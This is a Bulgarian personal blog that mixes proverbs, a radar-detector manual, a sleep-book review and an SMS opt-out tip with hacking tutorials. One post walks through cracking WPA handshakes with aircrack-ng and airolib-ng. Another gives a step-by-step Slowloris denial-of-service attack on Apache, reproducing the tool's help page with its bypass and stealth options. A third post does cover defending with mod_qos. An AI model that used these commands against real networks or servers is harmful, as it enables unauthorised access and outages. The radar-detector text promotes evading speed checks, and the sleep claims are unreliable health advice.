Мартин Петров Blog

Няколко африкански поговорки ми допадната доста като идеология и затова смятам да ги споделя тук:

Когато огромният баобаб падне, дори и малките козлета се покатерват и скачат по стъблото му.
Африканска поговорка

Ако трябва да те е страх, страхувай се от човека. Животните те отминават.
Африкански поговорки

Жените са като птиците, всички знаят, а малко казват. Мъжете нищо не знаят, а много казват.
Африканска поговорка

Ако слънцето изгряваше среднощ, щяхме да открием, че не само хиената е лоша.
Африканска поговорка

Смъртта е като луната. Кой е видял гърба и?
Африканска поговорка

Всичко, което кукурига, някога в било яйце.
Африканска поговорка

Преди да компилираме aircrack с поддържка на sqlite трябва да го инсталираме както и неговия

development пакет:

apt-get install libsqlite3-dev sqlite3

Сега ще изтеглим aircrack и ще го компилираме със sqlite3 поддръжка:

cd /root/
mkdir testing;
cd testing;
mkdir aircrack_compile
cd aircrack_compile;

wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
tar zxvf aircrack-ng-1.0.tar.gz
cd aircrack-ng-1.0

make sqlite=true unstable=true
make sqlite=true unstable=true install

Необходимо е да изпълним следната команда за да се изтегли OUI файла:

airodump-ng-oui-update

Излиза следното съобщение:

[*] Downloading IEEE OUI file…
[*] Parsing OUI file…
[*] Airodump-ng OUI file successfully updated

cd ..

Сега ще тестваме компилираният от нас aircrack като използваме wordlist без Sqlite:
Преди това може да видим каква е машината и забелязваме, че е двупроцесорна като всеки процесор е

3Ghz със 2 GB памет.

Сега ще тестваме с wordlist от 75000 ключа:

aircrack-ng -w /root/testing/wordlist.txt /root/testing/wireless_packets/wpa-01.cap

Забелязваме, че средно тества между 500-600 ключа за секунда

Което означава, че за да се тестват всичките ключове ще са необходими 75000/500=150 секунди=2.5 мин.

След като имам готов wordlist трябва да направя и ssidlist.txt където да опиша ssid-а на които ще

правим аудит:

vim ssidlist.txt

Сега ще подготвим нашата sqlite база за да тестваме aircrack със sqlite поддръжка.

След като вече компилирахме aircrack е необходимо да импортнем ssid-овете и списъка с пароли които

ще тестваме в sqlite базата mpetrov:

airolib-ng mpetrov1 --import essid /root/testing/ssidlist.txt
airolib-ng mpetrov1 --import passwd /root/testing/wordlist.txt
airolib-ng mpetrov1 --stats
airolib-ng mpetrov1 --clean all
airolib-ng mpetrov1 --batch (Изпълнението отнема доста време)
airolib-ng mpetrov1 --verify all

След като подготвихме базата ще направим тест на aircrack със sqlite

aircrack-ng –r mpetrov1 /root/testing/wireless_packets/wpa-01.cap

Опа. Забелязваме, че aircrack в комбинация със sqlite тества по 40 000 ключа за секунда или времето

което е необходимо за превъртането на този wordlist е по- малко от 2 секунди.

Разликата между нормален aircrack (2.5 мин.) и aircrack със sqlite поддържка (< 2 сек.) е повече от

ясна

Възможна грешка при компилирането на aircrack:

Грешка 1:
gcc -g -W -Wall -Werror -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=0  -I/usr/local/include -DHAVE_SQLITE

-Iinclude   -c -o aircrack-ng.o aircrack-ng.c
aircrack-ng.c:74:21: error: sqlite3.h: мЪЛЮ РЮЙЗБ ТЮИК ХКХ ДХПЕЙРНПХЪ
aircrack-ng.c:75: error: expected '=', ',', ';', 'asm' or '__attribute__' before '*' token
cc1: warnings being treated as errors
aircrack-ng.c: In function 'main':
aircrack-ng.c:4900: error: implicit declaration of function 'sqlite3_open'
aircrack-ng.c:4900: error: 'db' undeclared (first use in this function)
aircrack-ng.c:4900: error: (Each undeclared identifier is reported only once
aircrack-ng.c:4900: error: for each function it appears in.)
aircrack-ng.c:4901: error: implicit declaration of function 'sqlite3_errmsg'
aircrack-ng.c:4901: error: format '%s' expects type 'char *', but argument 3 has type 'int'
aircrack-ng.c:4902: error: implicit declaration of function 'sqlite3_close'
aircrack-ng.c:5561: error: implicit declaration of function 'sqlite3_mprintf'
aircrack-ng.c:5561: error: assignment makes pointer from integer without a cast
aircrack-ng.c:5563: error: implicit declaration of function 'sqlite3_exec'
aircrack-ng.c:5564: error: 'SQLITE_LOCKED' undeclared (first use in this function)
aircrack-ng.c:5564: error: 'SQLITE_BUSY' undeclared (first use in this function)
aircrack-ng.c:5570: error: 'SQLITE_OK' undeclared (first use in this function)
aircrack-ng.c:5570: error: 'SQLITE_ABORT' undeclared (first use in this function)
aircrack-ng.c:5572: error: implicit declaration of function 'sqlite3_free'
make[1]: *** [aircrack-ng.o] Error 1
make[1]: Leaving directory `/tmp/aircrack-ng-1.0/src'
make: *** [all] Error 2

Решение:
apt-get install libsqlite3-dev

Грешка 2:
In file included from aircrack-ng.c:65:
crypto.h:12:26: error: openssl/hmac.h: Няма такъв файл или директория
crypto.h:13:25: error: openssl/sha.h: Няма такъв файл или директория
crypto.h:15:25: error: openssl/rc4.h: Няма такъв файл или директория
crypto.h:16:25: error: openssl/aes.h: Няма такъв файл или директория
cc1: warnings being treated as errors
In file included from aircrack-ng.c:69:
sha1-sse2.h: In function ‘calc_4pmk’:
sha1-sse2.h:140: error: implicit declaration of function ‘HMAC’
sha1-sse2.h:140: error: implicit declaration of function ‘EVP_sha1’
aircrack-ng.c: In function ‘crack_wpa_thread’:
aircrack-ng.c:3910: error: implicit declaration of function ‘EVP_md5’
make[1]: *** [aircrack-ng.o] Error 1
make[1]: Leaving directory `/root/testing/aircrack_compile/aircrack-ng-1.0/src'
make: *** [all] Error 2

Решение: apt-get install libssl-dev

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

В предната публикация (Как да счупим Apache със Slowloris) обясних какво е Slowloris , за какво се ползва и  как работи т.е. как се чупи Apache с него. Както е всеизвестно най- лесно е да се счупи нещо(като се ползва готов инструмент разбира се), но също интересно е и да имаме добри превантимни мерки.

За защита на Apache от Slowloris и други подобни DoS атаки ще използваме един сравнително млад модул за Apache: qos (http://sourceforge.net/projects/mod-qos/) .

mod_qos е quality of service(QOS) модул за Apache. Той изпълнява механизми за контрол които могат да предоставят различни приоритети на различните заявки и да контролира достъпа до сървъра на базата на наличните ресурси

1. Ще инсталираме необходимите ни пакети за компилацията
apt-get install apache2-threaded-dev gcc

2. Изтегляме qos модула
cd /tmp/
wget http://freefr.dl.sourceforge.net/project/mod-qos/mod-qos/9.7/mod_qos-9.7.tar.gz

3. Ще го разархивираме и компилираме
tar zxvf mod_qos-9.7.tar.gz
cd mod_qos-9.7/apache2/
apxs2 -i -c mod_qos.c

Става ясно, че се е инсталирал във "/usr/lib/apache2/modules"

4. Сега ще направим конфигурация на модула
cd /etc/apache2/mods-available/
vim qos.load

LoadModule qos_module /usr/lib/apache2/modules/mod_qos.so

vim qos.conf

## QoS Settings
<IfModule mod_qos.c>
# handles connections from up to 100000 different IPs
QS_ClientEntries 100000
# will allow only 50 connections per IP
QS_SrvMaxConnPerIP 50
# maximum number of active TCP connections is limited to 256
MaxClients              256
# disables keep-alive when 70% of the TCP connections are occupied:
QS_SrvMaxConnClose      180
# minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):
QS_SrvMinDataRate       150 1200
# and limit request header and body (carefull, that limits uploads and post requests too):
# LimitRequestFields      30
# QS_LimitRequestBody     102400
</IfModule>

5. Сега зареждаме qos модула и рестартираме apache:

a2enmod qos
/etc/init.d/apache2 restart

Сега системата ни е защитена от Slowloris. За целта от предния урок може да тествате да я атакувате и ще се съгласите.

PS: Надявам се, че ще има благодарни адмнистратори които са го пропуснали в близките 6-7 месеца случва се на всеки затова го правя, за да се информираме взаимно)

За целта ще използваме httpd DoS тулка популярна от средата на 2009 година, написана от RSnake от ha.ckers или т.н. Slowloris

Как Slowloris претоварва Apache ?

Slowloris прави много конекции и ги задържа отворени като изпраща части от HTTP заявки. Slowloris продължава да изпраща хедъри на интервали за да предпази сокетите от затваряне.

Преди да счупим Apache ще изтеглим Slowloris от http://ha.ckers.org/slowloris/ или по- точно от тук:

wget http://ha.ckers.org/slowloris/slowloris.pl

След това трябва да инсталираме необходими модули за Perl:

perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'

или по- друг метод:

apt-get install libio-all-perl libio-socket-ssl-perl

След като инсталирахме модулите за perl трябва да инсталираме и perl-doc за да можем да разгледаме help страницата на Slowloris:

apt-get install perl-doc

Сега вече можем да стартираме Slowloris:

perl slowloris.pl

Извежда ни се първоначална инфо:

Welcome to Slowloris -- the low bandwidth, yet greedy and poisonous HTTP client

Usage:

perl slowloris.pl -dns [www.example.com] -options

Type 'perldoc slowloris.pl' for help with options.

Ето я и помощната страница:

perldoc slowloris.pl

TITLE
Slowloris

VERSION
Version 0.7 Beta

DATE
06/17/2009

AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella

ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ulti‐
mately performs a fairly low bandwidth denial of service.  It has the added benefit of allowing the server to come back at any
time (once the program is killed), and not spamming the logs excessively.  It also keeps the load nice and low on the target
server, so other vital processes don’t die unexpectedly, or cause alarm to anyone who is logged into the server for other rea‐
sons.

AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others…?

NOT AFFECTED
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others…?

DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you
can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it’s threads as they
patiently wait for more data.  Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate
for that by customizing the timeouts.  There is an added function to help you get started with finding the right sized timeouts
as well.

As a side note, Slowloris does not consume a lot of resources so modern operating systems don’t have a need to start shutting
down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circum‐
stances.  Think of Slowloris as the HTTP equivalent of a SYN flood.

Testing

If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:

Testing Example:

./slowloris.pl -dns www.example.com -port 80 -test

This won’t give you a perfect number, but it should give you a pretty good guess as to where to shoot for.  If you really must
know the exact number, you may want to mess with the @times array (although I wouldn’t suggest that unless you know what you’re
doing).

HTTP DoS

Once you find a timeout window, you can tune Slowloris to use certain timeout windows.  For instance, if you know that the server
has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and
increase the TCP timeout to 5 seconds.  The following example uses 500 sockets.  Most average Apache servers, for instance, tend
to fall down between 400-600 sockets with a default configuration.  Some are less than 300.  The smaller the timeout the faster
you will consume all the available resources as other sockets that are in use become available -- this would be solved by thread‐
ing, but that’s for a future revision.  The closer you can get to the exact number of sockets, the better, because that will
reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful.  Slowloris has no way to iden‐
tify if it’s successful or not though.

HTTP DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5

HTTPReady Bypass

HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET
or HEAD request with the -httpready switch.

HTTPReady Bypass Example

./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready

Stealth Host DoS

If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host
using the -shost variable.  This way the logs that are created will go to a different virtual host log file, but only if they are
kept separately.

Stealth Host DoS Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com

HTTPS DoS

Slowloris does support SSL/TLS on an experimental basis with the -https switch.  The usefulness of this particular option has not
been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the
early phases of development.  Your mileage may vary.

HTTPS DoS Example:

./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https

HTTP Cache

Slowloris does support cache avoidance on an experimental basis with the -cache switch.  Some caching servers may look at the
request path part of the header, but by sending different requests each time you can abuse more resources.  The usefulness of
this particular option has not been thoroughly tested.  Your mileage may vary.

HTTP Cache Example:

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
Issues
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it’s
current incarnation.  They may be ways around this, but not in this version at this time.  Most likely most anti-DDoS and load
balancers won’t be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.

Slowloris isn’t completely quiet either, because it can’t be.  Firstly, it does send out quite a few packets (although far far
less than a typical GET request flooder).  So it’s not invisible if the traffic to the site is typically fairly low.  On higher
traffic sites it will unlikely that it is noticed in the log files -- although you may have trouble taking down a larger site with
just one machine, depending on their architecture.

For some reason Slowloris works way better if run from a *Nix box than from Windows.  I would guess that it’s probably to do with
the fact that Windows limits the amount of open sockets you can have at once to a fairly small number.  If you find that you
can’t open any more ports than ~130 or so on any server you test -- you’re probably running into this "feature" of modern operat‐
ing systems.  Either way, this program seems to work best if run from FreeBSD.

Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or
proxy server will write to it’s logs with a lot of 400 (Bad Request) errors.  So while the sockets remain open, you won’t be in
the logs, but once the sockets close you’ll have quite a few entries all lined up next to one another.  You will probably be easy
to find if anyone is looking at their logs at that point -- although the DoS will be over by that point too.

What is a slow loris?
What exactly is a slow loris?  It’s an extremely cute but endangered mammal that happens to also be poisonous.  Check this out:

http://www.youtube.com/watch?v=rLdQ3UhLoD4

След като сме запознати с помощната страница ще направим един прост пример за чупене на Apache със Slowloris:

perl slowloris.pl -dns example.com -port 80 -timeout 1 -num 200 -cache

След известно време забелязваме, че Apache не отговаря- Той е счупен

Жертвата не вижда превишаване на ползваемостта на CPU от apache, не вижда и нищо в access лога, но ако пусне един tcpdump ще разбере за какво иде реч(tcpdump -i eth0 -vvvn dst port 80)

В следващата публикация  ще обясня как да се защитим от Slowloris- Как да защитим Apache от счупване причинено от Slowloris

Наложи ми се да пусна една малка уеб тулка която да ми показва публичният IP адрес и понеже е супер лесна за реализация реших да направя и допълнение което да извежда информация за браузъра на потребителя. Ето връзка и към тази тулка: Как да проверява какъв е моят IP Address

До всички читатели на този блог, както и до всички хора здраве и успех във всичките им начинания.

Абсолютно съм против да получавам sms-и от мобилните оператори за играта "Големият Кеш".  Именно поради тази причина позовавайки се на общите условия на "Големият кеш" цитирани по- долу се отказвам от "услугата"- "Големият кеш" .

Написах този пост понеже видях, че доста хора нямат идея как да прекратят това масово изпращане на sms-и от "Големият Кеш".

С няколко думи за да се откажа от получаването на sms-те от "Големият кеш" изпратих sms със съдържание "Stop" на номер 500 .

Извадка от ОБЩИ УСЛОВИЯ за участие във Викторината “Големият кеш”->Общи разпоредби:

Чл.50. В случай, че участник желае да не получава рекламни съобщения от Викторината, може да заяви това на организатора по всяко време като изпрати sms с текст Stop на номер 500 или чрез обаждане до номер 123 /0.03 лв с ДДС за обаждане за абонати и ползватели на Глобул/, *500 /безплатно за абонати и ползватели на Мобилтел/, *500 /безплатно за абонати и ползватели на Vivacom/. С изпращането на този sms, респективно с извършването на обаждането, рекламните съобщения до участника във Викторината се спират. В случай, че желае да възобнови участието си участникът следва да изпрати един sms към номер 500 .

Днес отново си смених лещите. Ей друго е човек да вижда що годе нормално

Преди месец едни приятели които имат магазин за авто части ми препоръчаха руски ниско бюджетен еквивалент на анти радар Cobra, а именно Saver. Много ме заинтригува понеже силно вярвам в по- скъпите неща понеже при повечето има логика да са така скъпи. След като ме убедиха си го купих за 35 лв.(Анти радарите Кобра струват 200-300 лв.) просто за пробата. Измина близо месец и след много каране не успях да разбера дали работи("Проблема" беше, че не карам вечер, а именно тогава има много наблюдатели от КАТ ). Тази вечер се пребирам и Анти радара Saver започна да бибитка малко по малко след няколко секунди бибиткането зачести и след няколко секунди започна да бибитка в права линия. Предположих, че ми сигнализира за сканиране с анти радар и Voilah имаше наблюдатели които ми навлизаха в личното пронстранство с тези лъчи. Междо другото не беше необходимо да намалявам скоростта понеже карам с нормална скорост, а и там нямаше как да карам с по- висока понеже беше наклон нагоре затова и сигнализирането не беше много време по- рано.

Тук е момента да приложа как се ползва:

Приборът АНТИРАДАР  Север G-213 е с гаранция ,предназначен за откриване на радари, фиксиращи скоростта. Той не пречи на  полицейските радари и не е забранен за ползуване.

Този модел антирадар е един от най-ефективните прибори за откриване на радарно облъчване. АНТИРАДАРЪТ работи в автоматичен режим и не изисква каквито и да е настройки.
Конструкцията на АНТИРАДАРА и употребяваните вносни възли гарантират безотказната работа в продължение на много години.

2. Поставяне на антирадара

За постигане на максимална ефективност на работа се препоръчва поставяне на радар-детектора в един от двата варианта.

2.1. На защитената от слънце козирка с използване на пружинна скоба. закрепването на скобата става като я поставяте в прореза на долната част на уреда до упор, при това трябва да се следи за появяването на пружинката в улея на корпуса. При необходимост, да се прибере пружината, просто трябва да се изтегли.

2.2. Чрез закрепване върху приборния панел.

Внимание! Между външния радар измерващ скоростта и приемателната повърхност на радар- детектора не трябва да има слънце защитни, метализирани лепенки, възможно е да отслабят или блокират напълно входящия сигнал. Включването на радар-детектора в електро-мрежата на автомобила става с помощта на специален кабел с два щекера.

Внимание! Забранява се оставянето на кабела под напрежение при снет уред. При подаване на напрежение се включва зеления индикатор “PWR”. При всяко включване, става автоматично тестването на прибора.

3. Работа на прибора

При приближаване на Вашият автомобил към зоната на радарния контрол на скоростта, детектора Ви известява със звуков и светлинен сигнал. Вие можете да намалите скоростта по-рано, преди да стане известна на КАТ.
Докато се приближавате към радара, честотата на звуковия сигнал се увеличава и по ред се запалват червените индикатори. В зоната на пряка видимост, сигналът звучи непрекъснато и светят три червени индикатори. Моделът има два режима на работа: “ГРАД” и “ТРАСЕ”.

В режим “ГРАД” (свети зелен индикатор “City”) приборът обезпечава максимална защита от лъжливи сработвания от многочислени източници на излъчване (TV, телефонни връзки, различни сигнализации и др.) Звуковия сигнал в режим “ГРАД” се появява само с второто ниво на индикация (светят два или три червени индикатори).

В режим “ТРАСЕ” детекторът осигурява максимална далечина. Превключването на режима се осъществява с последователно натискане на бутона “City”.

Забележка: При режим “ТРАСЕ” вследствие на високата чувствителност са възможни кратковременни сигнали за тревога в места със силно електромагнитно поле, а така също от приемане на паразитни излъчвания на радар-детектори, поставени на насрещните автомобили.
Пояснение: Болшинството чужди радар-детектори имат паразитно излъчване, като създават смущения във всички радар-детектори в насрещните или редом движещи се автомобили.

Предлагания модел G-213 не създава, каквито и да е излъчвания и радио-смущения и не пречи на работата на полицейските радари.

G-213, това е чист приемник на CB4 – облъчвания, който не може да бъде открит от каквото и да било разстояние.

Наличието на детектора във Вашия автомобил не може да се явява причина или санкции от страна на КАТ.

За повишаване на комфорта при ползване на прибора, може да се приглуши звуковия сигнал. Затова трябва да се натисне бутонът “MUTE” (светва зеления индикатор “MUTE”) като светлинната индикация работи без изменение.

При всяко включване на уреда – радар-детекторът автоматично се установява в режим “ТРАСЕ” и “ПЪЛНА ЗВУКОВА МОЩНОСТ”.

Технически характеристики

Диапазон на работни честоти 10,500 – 10,550

Максимална далечина откриваща радара в километри 5,0
Напрежение на захранване 12; +4,0; -1,5
Ток работен мАмпера не повече от 30
Диапазон на работна температура от -20 до + 50
Тежина в грама 120

Обслужваното разстояние (далечината) зависи от много фактори (релеф на местността, метео-условия, ниво на електромагнитните смущения) и може да се намали. Разбира се от същите условия зависи и дължината, на която е възможно измерване на скоростта на Вашия автомобил. Ето защо, радар-детектора поставен на Вашия автомобил постоянно обезпечава предимството пред полицейския радар.

Днес попаднах в една книжарница и още по случайно на една книжка стил американска банална пропаганда- "Как да спим по- малко и да сме по- енергични" от Praetor Publishers. Смея да твърдя, че книжката е с доста глупава корица, но къде не съм дал 7.99 лв. и реших да си я купя дори и с риска да стои захвърлена в библиотеката ми.

След като я прочетох за доста малко време и останах положително очарован от факти и съвети които не знаех реших да напиша няколко неща и изводи от книгата които предполагам биха заинтригували по- голяма част от хората:

1. Правилното хидратиране за вашата система на съня е като машинното масло за автомобил. Необходимо е получаването на повече слънчева светлина за да се понижи нивото на мелатонин. При високи нива на мелатонин човешкото тяло се чуства сънливо и немотивирано през деня.

2. Основният ефект от дехадратирането се вижда в кръвта- кръвта се сгъстява и не може да пренася кислород до всички части на тялото. В резултат от това чувствате умора и липса на достатъчно енергия. Отслабва и имунната система.

3. Необходимо е физическо натоварване което води до нужда от дълбок сън. Дълбокият сън на практика е фазата от сънят като цяло която въздеиства най- благотворно на възстановителния процес.

4. Дават решение на следобедното преспиване, а именно точно тогава има спад на телесната температура което води до привидна умора. Решение на това според книгата е малка  дрямка не повече от 15-45 минути понеже могат да се засегнат другите фази на сънят и нещата да се влошат още повече.

5. Позата на сън е отново много важна. Спането по корем и на страни създава ненужно налягане върху някои жизненоважни органи като стомах, дробове и черва. Освен това се създава голямо напрежение за врата и гърба, което прави сънят много неспокоен и често е основна причина за проблеми с гърба. За целта най- добрата поза т.е. правилната поза е да се спи по гръб.

6. В книгата много сериозно отричат тютюнопушенето както и употребата на кофеин. С няколко думи "НЕ НА КОФЕИНА И НИКОТИНА".

Оставам на Вас да прочетете книжката и сами да се убедите колко са верни всички факти за вредите които нанасят кофеина и никотина както и за изброените съвети по- горе.

Абе като цяло книжката си заслужава както всички прозорци към знанието.